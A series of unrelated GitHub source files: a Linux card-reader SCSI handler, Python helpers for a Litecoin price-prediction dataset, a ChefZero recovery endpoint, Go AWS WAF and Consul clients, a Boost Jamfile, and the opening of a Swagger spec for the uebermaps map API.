(srb->cmnd[9] == 0x0C)) {
retval = mg_set_leaf_id(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
case KF_CHG_HOST:
if ((scsi_bufflen(srb) == 0x0C) &&
(srb->cmnd[8] == 0x00) &&
(srb->cmnd[9] == 0x0C)) {
retval = mg_chg(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
case KF_RSP_HOST:
if ((scsi_bufflen(srb) == 0x0C) &&
(srb->cmnd[8] == 0x00) &&
(srb->cmnd[9] == 0x0C)) {
retval = mg_rsp(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
case KF_SET_ICV:
ms_card->mg_entry_num = srb->cmnd[5];
if ((scsi_bufflen(srb) == 0x404) &&
(srb->cmnd[8] == 0x04) &&
(srb->cmnd[9] == 0x04) &&
(srb->cmnd[2] == 0x00) &&
(srb->cmnd[3] == 0x00) &&
(srb->cmnd[4] == 0x00) &&
(srb->cmnd[5] < 32)) {
retval = mg_set_ICV(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
#endif
int rtsx_scsi_handler(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
#ifdef SUPPORT_SD_LOCK
struct sd_info *sd_card = &(chip->sd_card);
#endif
struct ms_info *ms_card = &(chip->ms_card);
unsigned int lun = SCSI_LUN(srb);
int result;
#ifdef SUPPORT_SD_LOCK
if (sd_card->sd_erase_status) {
/* Block all SCSI command except for
* REQUEST_SENSE and rs_ppstatus
*/
if (!((srb->cmnd[0] == VENDOR_CMND) &&
(srb->cmnd[1] == SCSI_APP_CMD) &&
(srb->cmnd[2] == GET_DEV_STATUS)) &&
(srb->cmnd[0] != REQUEST_SENSE)) {
/* Logical Unit Not Ready Format in Progress */
set_sense_data(chip, lun, CUR_ERR,
0x02, 0, 0x04, 0x04, 0, 0);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
#endif
if ((get_lun_card(chip, lun) == MS_CARD) &&
(ms_card->format_status == FORMAT_IN_PROGRESS)) {
if ((srb->cmnd[0] != REQUEST_SENSE) && (srb->cmnd[0] != INQUIRY)) {
/* Logical Unit Not Ready Format in Progress */
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04,
0, (u16)(ms_card->progress));
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
switch (srb->cmnd[0]) {
case READ_10:
case WRITE_10:
case READ_6:
case WRITE_6:
result = read_write(srb, chip);
#if !defined(LED_AUTO_BLINK) && !defined(REGULAR_BLINK)
led_shine(srb, chip);
#endif
break;
case TEST_UNIT_READY:
result = test_unit_ready(srb, chip);
break;
case INQUIRY:
result = inquiry(srb, chip);
break;
case READ_CAPACITY:
result = read_capacity(srb, chip);
break;
case START_STOP:
result = start_stop_unit(srb, chip);
break;
case ALLOW_MEDIUM_REMOVAL:
result = allow_medium_removal(srb, chip);
break;
case REQUEST_SENSE:
result = request_sense(srb, chip);
break;
case MODE_SENSE:
case MODE_SENSE_10:
result = mode_sense(srb, chip);
break;
case 0x23:
result = read_format_capacity(srb, chip);
break;
case VENDOR_CMND:
result = vendor_cmnd(srb, chip);
break;
case MS_SP_CMND:
result = ms_sp_cmnd(srb, chip);
break;
#ifdef SUPPORT_CPRM
case SD_PASS_THRU_MODE:
case SD_EXECUTE_NO_DATA:
case SD_EXECUTE_READ:
case SD_EXECUTE_WRITE:
case SD_GET_RSP:
case SD_HW_RST:
result = sd_extention_cmnd(srb, chip);
break;
#endif
#ifdef SUPPORT_MAGIC_GATE
case CMD_MSPRO_MG_RKEY:
result = mg_report_key(srb, chip);
break;
case CMD_MSPRO_MG_SKEY:
result = mg_send_key(srb, chip);
break;
#endif
case FORMAT_UNIT:
case MODE_SELECT:
case VERIFY:
result = TRANSPORT_GOOD;
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
result = TRANSPORT_FAILED;
}
return result;
}
| {
"pile_set_name": "Github"
} |
utilities for network time protocol support
| {
"pile_set_name": "Github"
} |
import numpy as np
import pandas as pd
import processlogs2 as pl2
import indicators as ind
import data
import csv
import cPickle
import time
#################
#
# MINMAX NORMALIZE
#
#################
def minmax( dataset, crt=False, std=False):
""" Remap each column to -1, 1 based on min/max. We can choose to
skip CRT and STD. By default we only normalize presumably the TIs.
TODO: crt and std inclusion not implemented
"""
columns = dataset.columns
for column in columns:
#if ("STD" not in column) and ("CRT" not in column):
A = dataset[column]
imin = -1
imax = 1
dmin = np.min(A)
dmax = np.max(A)
B = imin + (imax - imin)*(A - dmin)/(dmax - dmin)
dataset = dataset.drop( [column], axis=1)
dataset = dataset.join( pd.DataFrame( {column:B}, index=[B.index]), how="outer")
#elif crt or std:
# raise NotImplementedError
return dataset
#################
#
# GEN DS
#
#################
def gen_ds( dataset, forward, opts, type='CRT'):
# trim leading NaN vals ... takes time to warm up the indicators
dataset = cut_init_nans( dataset)
# targets as compound returns
if type == 'CRT':
# generate ohlc so we can calculate n-forward CRTs
ohlc = pd.DataFrame( {"open":dataset["LTC_open_%s"%opts["time_str"]],
"high":dataset["LTC_high_%s"%opts["time_str"]],
"low":dataset["LTC_low_%s"%opts["time_str"]],
"close": dataset["LTC_close_%s"%opts["time_str"]]},
index=dataset["LTC_open_%s"%opts["time_str"]].index)
CRT_1 = ind.CRT( ohlc, 1)
# move those forward CRTs back, so we can use them as target, correct predictions
tgt = CRT_1.shift(-1)
elif type == 'PRICE':
# bring next price back so we can use it as target
tgt = dataset["LTC_close_%s"%opts["time_str"]].shift(-1)
tgt.name = 'tgt'
# drop off OHLC data
dataset = dataset.drop( [ "LTC_open_%s"%opts["time_str"],
"LTC_high_%s"%opts["time_str"],
"LTC_low_%s"%opts["time_str"],
"LTC_close_%s"%opts["time_str"] ], axis=1)
# trim nans off end
tgt = tgt.ix[:-1*forward]; dataset = dataset.ix[:-1*forward]
# return
return dataset, tgt
###########################
# CRT SINGLE
###########################
def crt_single( initial, final, n = 1):
""" Calculate compound return of two prices. For use in
generating target values from and to match our input.
initial : initial investment
final : final price
n : (default 5) periods this happened over. Since its relative to
the compound returns in our LTC Coin class, which is calculated
from OHLC data every 1min, this needs to match that breakdown
(mins to mins, secs to secs, etc).
"""
crt = np.log( final / initial) / n
return crt
###########################
# TARGETS
###########################
def gen_target( dataset, N=1):
""" Generate N-period target predictions based on close column
in dataset. We assume this is already in pct change. The close
column shouldn't be normalized or anything.
"""
tgt = dataset.close.shift(-1*N)
return tgt
###########################
# TARGETS
###########################
def gen_target_crt( dataset, N=1):
""" Generate N-period target predictions based on close column
in dataset. The close column shouldn't be normalized or anything.
"""
if N < 0:
# what was the change over the last period? (btwn t-N and t)
tgt = crt_single( dataset.close.shift(-1*N), dataset.close )
else:
#
tgt = crt_single( dataset.close, dataset.close.shift(-1*N))
return tgt
############################
# CUT_INIT_NANS
###########################
def cut_init_nans( dataset):
""" Because of initialization of things like rolling means, etc,
the first vals of a lot of the columns produced by Data are
NaN. Well, this fucks backprop, so we need to trim it.
dataset : a pandas DataFrame
returns: the dataset minus the NaNs at the start
"""
# find first non-NaN val, cut there (it needs time to warm up)
iii = 0
for iii in xrange( len(dataset)):
nn = False
for iiii in dataset.ix[iii]:
if np.isnan(iiii):
nn = True
if nn == False:
dataset = dataset.ix[iii:]
break
return dataset
############################
# SAVE_CSV
###########################
def save_csv( dataset_t, tgt, name=""):
""" Save a dataset, both the inputs (dataset) and targets (tgt)
as two CSV files for input to a matlab neural network
dataset_t : the dataset used as input to neural net
tgt : the targets, or correct values, to train/evaluate the NN
name : name to label dataset ... e.g. "train", "test", etc
"""
if not name:
name = str(time.time())
with open('%s.dataset.csv'%name, 'wb') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_NONE)
writer.writerows(dataset_t.values)
with open('%s.tgt.csv'%name, 'wb') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_NONE)
if type(tgt.values[0]) == np.ndarray:
writer.writerows([ v for v in tgt.values])
else:
writer.writerows([ [v] for v in tgt.values])
###########################
# STORE_PICK
###########################
def store_pick( d):
""" Store a fully-loaded Data class as a pickle
d : a Data class
"""
name = str(time.time())+".d."+d.filename+".pickle"
filename = os.path.realpath( os.path.join( "pickles", name))
f = open( filename, "w")
cPickle.dump( d, f)
f.close()
###########################
# LOAD_PICK
###########################
def load_pick( filename):
""" Load a fully-loaded Data class as a pickle
filename : filename of pickle
"""
filename = os.path.realpath( os.path.join( "pickles", filename))
f = open( filename, "r")
d = cPickle.load( f)
f.close()
return d
| {
"pile_set_name": "Github"
} |
require "ffi_yajl" unless defined?(FFI_Yajl)
require_relative "../rest_base"
module ChefZero
module Endpoints
# /system_recovery
class SystemRecoveryEndpoint < RestBase
def post(request)
request_json = FFI_Yajl::Parser.parse(request.body)
name = request_json["username"]
password = request_json["password"]
user = get_data(request, request.rest_path[0..-2] + ["users", name], :nil)
unless user
raise RestErrorResponse.new(403, "Nonexistent user")
end
user = FFI_Yajl::Parser.parse(user)
user = ChefData::DataNormalizer.normalize_user(user, name, [ "username" ], server.options[:osc_compat])
unless user["recovery_authentication_enabled"]
raise RestErrorResponse.new(403, "Only users with recovery_authentication_enabled=true may use /system_recovery to log in")
end
if user["password"] != password
raise RestErrorResponse.new(401, "Incorrect password")
end
json_response(200, user)
end
end
end
end
| {
"pile_set_name": "Github"
} |
// Code generated by smithy-go-codegen DO NOT EDIT.
package waf
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/retry"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/waf/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// This is AWS WAF Classic documentation. For more information, see AWS WAF Classic
// (https://docs.aws.amazon.com/waf/latest/developerguide/classic-waf-chapter.html)
// in the developer guide. For the latest version of AWS WAF, use the AWS WAFV2 API
// and see the AWS WAF Developer Guide
// (https://docs.aws.amazon.com/waf/latest/developerguide/waf-chapter.html). With
// the latest version, AWS WAF has a single set of endpoints for regional and
// global use. Creates an XssMatchSet (), which you use to allow, block, or count
// requests that contain cross-site scripting attacks in the specified part of web
// requests. AWS WAF searches for character sequences that are likely to be
// malicious strings. To create and configure an XssMatchSet, perform the following
// steps:
//
// * Use GetChangeToken () to get the change token that you provide in
// the ChangeToken parameter of a CreateXssMatchSet request.
//
// * Submit a
// CreateXssMatchSet request.
//
// * Use GetChangeToken to get the change token
// that you provide in the ChangeToken parameter of an UpdateXssMatchSet ()
// request.
//
// * Submit an UpdateXssMatchSet () request to specify the parts of
// web requests in which you want to allow, block, or count cross-site scripting
// attacks.
//
// For more information about how to use the AWS WAF API to allow or
// block HTTP requests, see the AWS WAF Developer Guide
// (https://docs.aws.amazon.com/waf/latest/developerguide/).
func (c *Client) CreateXssMatchSet(ctx context.Context, params *CreateXssMatchSetInput, optFns ...func(*Options)) (*CreateXssMatchSetOutput, error) {
stack := middleware.NewStack("CreateXssMatchSet", smithyhttp.NewStackRequest)
options := c.options.Copy()
for _, fn := range optFns {
fn(&options)
}
addawsAwsjson11_serdeOpCreateXssMatchSetMiddlewares(stack)
awsmiddleware.AddRequestInvocationIDMiddleware(stack)
smithyhttp.AddContentLengthMiddleware(stack)
AddResolveEndpointMiddleware(stack, options)
v4.AddComputePayloadSHA256Middleware(stack)
retry.AddRetryMiddlewares(stack, options)
addHTTPSignerV4Middleware(stack, options)
awsmiddleware.AddAttemptClockSkewMiddleware(stack)
addClientUserAgent(stack)
smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
smithyhttp.AddCloseResponseBodyMiddleware(stack)
addOpCreateXssMatchSetValidationMiddleware(stack)
stack.Initialize.Add(newServiceMetadataMiddleware_opCreateXssMatchSet(options.Region), middleware.Before)
addRequestIDRetrieverMiddleware(stack)
addResponseErrorMiddleware(stack)
for _, fn := range options.APIOptions {
if err := fn(stack); err != nil {
return nil, err
}
}
handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
result, metadata, err := handler.Handle(ctx, params)
if err != nil {
return nil, &smithy.OperationError{
ServiceID: ServiceID,
OperationName: "CreateXssMatchSet",
Err: err,
}
}
out := result.(*CreateXssMatchSetOutput)
out.ResultMetadata = metadata
return out, nil
}
// A request to create an XssMatchSet ().
type CreateXssMatchSetInput struct {
// A friendly name or description for the XssMatchSet () that you're creating. You
// can't change Name after you create the XssMatchSet.
Name *string
// The value returned by the most recent call to GetChangeToken ().
ChangeToken *string
}
// The response to a CreateXssMatchSet request.
type CreateXssMatchSetOutput struct {
// The ChangeToken that you used to submit the CreateXssMatchSet request. You can
// also use this value to query the status of the request. For more information,
// see GetChangeTokenStatus ().
ChangeToken *string
// An XssMatchSet ().
XssMatchSet *types.XssMatchSet
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
}
func addawsAwsjson11_serdeOpCreateXssMatchSetMiddlewares(stack *middleware.Stack) {
stack.Serialize.Add(&awsAwsjson11_serializeOpCreateXssMatchSet{}, middleware.After)
stack.Deserialize.Add(&awsAwsjson11_deserializeOpCreateXssMatchSet{}, middleware.After)
}
func newServiceMetadataMiddleware_opCreateXssMatchSet(region string) awsmiddleware.RegisterServiceMetadata {
return awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "waf",
OperationName: "CreateXssMatchSet",
}
}
| {
"pile_set_name": "Github"
} |
package consulwatch
import (
"fmt"
"log"
"os"
consulapi "github.com/hashicorp/consul/api"
"github.com/hashicorp/consul/api/watch"
)
type ServiceWatcher struct {
ServiceName string
consul *consulapi.Client
logger *log.Logger
plan *watch.Plan
}
func New(client *consulapi.Client, logger *log.Logger, datacenter string, service string, onlyHealthy bool) (*ServiceWatcher, error) {
// NOTE [email protected], 2019-03-04
// ======================================
//
// Technically we can watch on a specific "tag" for a Consul service. And in theory Consul via its CLI allows
// watching multiple tags, however, the watch API only allows watching one specific tag which makes it kind of
// useless unless you want to setup a watch per tag. The better approach and the reason the "tag" argument is not
// supplied below is because it is conceptually simpler to post-process the array of Endpoints returned during a
// watch and construct a map of tag names to an array of endpoints.
plan, err := watch.Parse(map[string]interface{}{
"type": "service",
"datacenter": datacenter,
"service": service,
"passingonly": onlyHealthy,
})
if err != nil {
return nil, err
}
if logger == nil {
logger = log.New(os.Stdout, "", log.LstdFlags)
}
return &ServiceWatcher{consul: client, logger: logger, ServiceName: service, plan: plan}, nil
}
func (w *ServiceWatcher) Watch(handler func(endpoints Endpoints, err error)) {
w.plan.HybridHandler = func(val watch.BlockingParamVal, raw interface{}) {
endpoints := Endpoints{Service: w.ServiceName, Endpoints: []Endpoint{}}
if raw == nil {
handler(endpoints, fmt.Errorf("unexpected empty/nil response from consul"))
return
}
v, ok := raw.([]*consulapi.ServiceEntry)
if !ok {
handler(endpoints, fmt.Errorf("unexpected raw type expected=%T, actual=%T", []*consulapi.ServiceEntry{}, raw))
return
}
endpoints.Endpoints = make([]Endpoint, 0)
for _, item := range v {
tags := make([]string, 0)
if item.Service.Tags != nil {
tags = item.Service.Tags
}
endpoints.Endpoints = append(endpoints.Endpoints, Endpoint{
Service: item.Service.Service,
SystemID: fmt.Sprintf("consul::%s", item.Node.ID),
ID: item.Service.ID,
Address: item.Service.Address,
Port: item.Service.Port,
Tags: tags,
})
}
handler(endpoints, nil)
}
}
func (w *ServiceWatcher) Start() error {
return w.plan.RunWithClientAndLogger(w.consul, w.logger)
}
func (w *ServiceWatcher) Stop() {
w.plan.Stop()
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,dragonfly
package unix
import (
"syscall"
"unsafe"
)
func setTimespec(sec, nsec int64) Timespec {
return Timespec{Sec: sec, Nsec: nsec}
}
func setTimeval(sec, usec int64) Timeval {
return Timeval{Sec: sec, Usec: usec}
}
func SetKevent(k *Kevent_t, fd, mode, flags int) {
k.Ident = uint64(fd)
k.Filter = int16(mode)
k.Flags = uint16(flags)
}
func (iov *Iovec) SetLen(length int) {
iov.Len = uint64(length)
}
func (msghdr *Msghdr) SetControllen(length int) {
msghdr.Controllen = uint32(length)
}
func (cmsg *Cmsghdr) SetLen(length int) {
cmsg.Len = uint32(length)
}
func sendfile(outfd int, infd int, offset *int64, count int) (written int, err error) {
var writtenOut uint64 = 0
_, _, e1 := Syscall9(SYS_SENDFILE, uintptr(infd), uintptr(outfd), uintptr(*offset), uintptr(count), 0, uintptr(unsafe.Pointer(&writtenOut)), 0, 0, 0)
written = int(writtenOut)
if e1 != 0 {
err = e1
}
return
}
func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 uintptr, err syscall.Errno)
| {
"pile_set_name": "Github"
} |
# Boost.Ratio library documentation Jamfile ---------------------------------
#
# Copyright Vicente J. Botet Escriba 2010. Use, modification and
# distribution is subject to the Boost Software License, Version
# 1.0. (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#
# See http://www.boost.org for updates, documentation, and revision history.
#import doxygen ;
import quickbook ;
#doxygen autodoc
# :
# [ glob ../../../boost/chrono/*.hpp ]
# [ glob ../../../boost/chrono/allocators/*.hpp ]
# :
# <doxygen:param>EXTRACT_ALL=NO
# <doxygen:param>HIDE_UNDOC_MEMBERS=YES
# <doxygen:param>EXTRACT_PRIVATE=NO
# <doxygen:param>EXPAND_ONLY_PREDEF=YES
# <doxygen:param>PREDEFINED=BOOST_INTERPROCESS_DOXYGEN_INVOKED
# <xsl:param>"boost.doxygen.reftitle=Boost.Chrono Reference"
# ;
xml ratio : ratio.qbk ;
boostbook standalone
:
ratio
:
# HTML options first:
# Use graphics not text for navigation:
<xsl:param>navig.graphics=1
# How far down we chunk nested sections, basically all of them:
<xsl:param>chunk.section.depth=0
# Don't put the first section on the same page as the TOC:
<xsl:param>chunk.first.sections=1
# How far down sections get TOC's
<xsl:param>toc.section.depth=4
# Max depth in each TOC:
<xsl:param>toc.max.depth=2
# How far down we go with TOC's
<xsl:param>generate.section.toc.level=10
# Path for links to Boost:
<xsl:param>boost.root=../../../..
# Path for libraries index:
<xsl:param>boost.libraries=../../../../libs/libraries.htm
# Use the main Boost stylesheet:
<xsl:param>html.stylesheet=../../../../doc/src/boostbook.css
# PDF Options:
# TOC Generation: this is needed for FOP-0.9 and later:
<xsl:param>fop1.extensions=0
# Or enable this if you're using XEP:
<xsl:param>xep.extensions=1
# TOC generation: this is needed for FOP 0.2, but must not be set to zero for FOP-0.9!
<xsl:param>fop.extensions=0
# No indent on body text:
<xsl:param>body.start.indent=0pt
# Margin size:
<xsl:param>page.margin.inner=0.5in
# Margin size:
<xsl:param>page.margin.outer=0.5in
# Yes, we want graphics for admonishments:
<xsl:param>admon.graphics=1
# Set this one for PDF generation *only*:
# default pnd graphics are awful in PDF form,
# better use SVG's instead:
<format>pdf:<xsl:param>admon.graphics.extension=".svg"
<format>pdf:<xsl:param>admon.graphics.path=$(boost-images)/
<format>pdf:<xsl:param>boost.url.prefix=http://www.boost.org/doc/libs/release/libs/ratio/doc/html
;
install pdfinstall : standalone/<format>pdf : <location>. <install-type>PDF ;
explicit pdfinstall ;
###############################################################################
alias boostdoc
: ratio
:
: #<dependency>autodoc
: ;
explicit boostdoc ;
alias boostrelease ;
explicit boostrelease ;
| {
"pile_set_name": "Github"
} |
swagger: "2.0"
host: uebermaps.com
basePath: /api/v2
info:
contact:
name: uebermaps API Team
description: Enable people to store spots on public and private maps
termsOfService: https://uebermaps.com/terms/
title: uebermaps API endpoints
version: "2.0"
x-apisguru-categories:
- location
x-logo:
url: https://twitter.com/uebermaps/profile_image?size=original
x-origin:
- format: swagger
url: https://uebermaps.com/api/v2/apidocs
version: "2.0"
x-providerName: uebermaps.com
consumes:
- application/json
produces:
- application/json
paths:
/account:
patch:
description: Update account. Wrap map parameters in [user].
parameters:
- description: user attributes
in: body
name: user
required: false
schema:
$ref: "#/definitions/UserEditable"
responses:
"200":
description: Contains user data.
schema:
$ref: "#/definitions/User"
summary: Update account
tags:
- Account
"/attachments/{id}":
delete:
description: Delete attachment.
parameters:
- description: Attachment id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted attachment.
schema:
$ref: "#/definitions/Attachment"
summary: Delete attachment
tags:
- Attachments
/authentication:
post:
description: Sign in user. Wrap authentication parameters in [user].
parameters:
- description: user authentication attributes
in: body
name: user
required: true
schema:
$ref: "#/definitions/UserAuthentication"
responses:
"200":
description: Contains user data including authentication token for subsequent requests
schema:
$ref: "#/definitions/UserFullProfile"
summary: Sign in user
tags:
- Authentication
/collaborator_invitations:
get:
description: List your collaborator invitations.
responses:
"200":
description: Contains list of collaborator invitations.
schema:
items:
$ref: "#/definitions/CollaboratorInvitation"
type: array
summary: List your collaborator invitations
tags:
- CollaboratorInvitations
post:
description: Invite user to collaborate on map.
parameters:
- description: Supply map_id and either a comma separated list of user_ids or emails. Optionally you can provide a 'is_admin' parameter with 'true' or 'false' to give the invited users admin privileges.
in: body
name: body
schema:
$ref: "#/definitions/CollaboratorInvitationCreate"
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Invite user to collaborate on map
tags:
- CollaboratorInvitations
"/collaborator_invitations/{id}":
delete:
description: Delete collaborator invitation.
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted collaborator invitation.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Delete collaborator invitation
tags:
- CollaboratorInvitations
get:
description: Show collaborator invitation
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Show collaborator invitation
tags:
- CollaboratorInvitations
patch:
description: Accept collaborator invitation.
parameters:
- description: Collaborator invitation id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains collaborator invitation data.
schema:
$ref: "#/definitions/CollaboratorInvitation"
summary: Accept collaborator invitation.
tags:
- CollaboratorInvitations
"/comments/{id}":
delete:
description: Delete comment.
parameters:
- description: Comment id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted comment.
schema:
$ref: "#/definitions/Comment"
summary: Delete comment
tags:
- Comments
patch:
description: Update comment. Wrap comment parameters in [comment].
parameters:
- description: Comment id
in: path
name: id
required: true
type: integer
- description: Comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Update comment
tags:
- Comments
/events:
get:
description: List your own events.
parameters:
- description: Begin of time range of event (ISO 8601 date format).
in: query
name: timeframe_start
required: false
type: string
- description: End of time range of event (ISO 8601 date format).
in: query
name: timeframe_end
required: false
type: string
- description: "To refine your event index request to contain only events within a geographical box pass the followng bounds parameters. F. e. to get events within 'Hamburg, St. Pauli': bounds[sw_lat]=53.54831449741324 bounds[sw_lon]=9.943227767944336 bounds[ne_lat]=53.5571103674878 bounds[ne_lon]=9.9776029586792"
in: query
name: bounds
required: false
type: string
responses:
"200":
description: Contains list of events.
schema:
items:
$ref: "#/definitions/Event"
type: array
summary: List your own events
tags:
- Events
"/events/{id}":
delete:
description: Delete event.
parameters:
- description: Event id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted event.
schema:
$ref: "#/definitions/Event"
summary: Delete event
tags:
- Events
get:
description: Get basic information about an event
parameters:
- description: Id of event
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains event data.
schema:
$ref: "#/definitions/Event"
summary: Get event
tags:
- Events
patch:
description: Update event. Wrap event parameters in [event].
parameters:
- description: Event id
in: path
name: id
required: true
type: integer
- description: Event attributes
in: body
name: event
required: false
schema:
$ref: "#/definitions/EventEditable"
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/Map"
summary: Update event
tags:
- Events
/maps:
get:
description: List your own maps.
responses:
"200":
description: Contains list of maps.
schema:
items:
$ref: "#/definitions/Map"
type: array
summary: List your own maps
tags:
- Maps
post:
description: Create map. Wrap map parameters in [map]. To add a map header picture pass a base64 encoded string to [map][picture].
parameters:
- description: map attributes
in: body
name: map
required: false
schema:
$ref: "#/definitions/MapEditable"
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/Map"
summary: Create map
tags:
- Maps
/maps/search:
get:
description: Search maps
parameters:
- description: Query
in: query
name: q
type: string
- description: "Distance. Diameter of search radius in meter (default: 2000 meter)"
in: query
name: d
type: integer
- description: "Latitude for search radius (default distance: 2000 meter)"
in: query
name: lat
type: number
- description: "Longitude for search radius (default distance: 2000 meter)"
in: query
name: lon
type: number
responses:
"200":
description: Contains map data.
schema:
$ref: "#/definitions/Map"
summary: Search maps
tags:
- Search
"/maps/{id}":
delete:
description: Delete map.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains deleted map.
schema:
$ref: "#/definitions/Map"
summary: Delete map
tags:
- Maps
get:
description: Get basic information about a map
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/MapWithRelation"
summary: Get map
tags:
- Maps
patch:
description: Update map. Wrap map parameters in [map]. To update the map header picture pass a base64 encoded string to [map][picture].
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: map settings attributes
in: body
name: map
required: false
schema:
$ref: "#/definitions/MapEditable"
responses:
"200":
description: Contains map data, map settings and your relation to this map
schema:
$ref: "#/definitions/Map"
summary: Update map
tags:
- Maps
"/maps/{id}/attachments":
get:
description: List attachments for a given map.
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of attachments.
schema:
items:
$ref: "#/definitions/Attachment"
type: array
summary: List attachments for a given map
tags:
- Attachments
post:
description: Upload map attachment. Wrap attachment parameters in [attachment]
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
- description: Base64 encoded image
in: body
name: image
required: true
schema:
type: string
responses:
"200":
description: Contains attachment data
schema:
$ref: "#/definitions/Attachment"
summary: Upload map attachment
tags:
- Attachments
"/maps/{id}/collaborators/":
get:
description: List collaborators of a map.
parameters:
- description: Map id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of collaborators.
schema:
items:
$ref: "#/definitions/Collaborator"
type: array
summary: List collaborators of a map
tags:
- Collaborators
"/maps/{id}/collaborators/{user_id}":
delete:
description: Delete collaboration.
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: user id
in: path
name: user_id
required: true
type: integer
responses:
"200":
description: Contains deleted collaborator.
schema:
$ref: "#/definitions/Collaborator"
summary: Delete collaboration
tags:
- Collaborators
patch:
description: Update collaborator. Wrap collaborator parameters in [collaborator]
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: user id
in: path
name: user_id
required: true
type: integer
- description: collaborator attributes
in: body
name: collaborator
required: false
schema:
$ref: "#/definitions/CollaboratorEditable"
responses:
"200":
description: Contains collaborator data
schema:
$ref: "#/definitions/Collaborator"
summary: Update collaborator
tags:
- Collaborators
"/maps/{id}/comments":
get:
description: List comments for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of comments.
schema:
items:
$ref: "#/definitions/Comment"
type: array
summary: List comments for a given map
tags:
- Comments
post:
description: Create map comment. Wrap comment parameters in [comment].
parameters:
- description: map id
in: path
name: id
required: true
type: integer
- description: comment attributes
in: body
name: comment
required: false
schema:
$ref: "#/definitions/CommentEditable"
responses:
"200":
description: Contains comment data
schema:
$ref: "#/definitions/Comment"
summary: Create map comment
tags:
- Comments
"/maps/{id}/respots":
get:
description: List respots of a map.
parameters:
- description: Map Id
in: path
name: id
required: true
type: integer
responses:
"200":
description: Contains list of respots.
schema:
items:
$ref: "#/definitions/Respot"
type: array
summary: List respots of a map
tags:
- Respots
"/maps/{id}/spots":
get:
description: List spots for a given map.
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
- description: Order of spots
enum:
- created_at_asc
- created_at_desc
- updated_at_asc
- updated_at_desc
- title_asc
- title_desc
in: query
name: order
type: string
responses:
"200":
description: Contains list of spots.
schema:
items:
$ref: "#/definitions/Spot"
type: array
summary: List spots for a given map
tags:
- Spots
post:
description: Create spot. Wrap parameters in [spot]. To add a spot picture pass a base64 encoded string to [spot][picture].
parameters:
- description: Id of map
in: path
name: id
required: true
type: integer
- description: spot attributes
in: body
name: spot
required: true
schema:
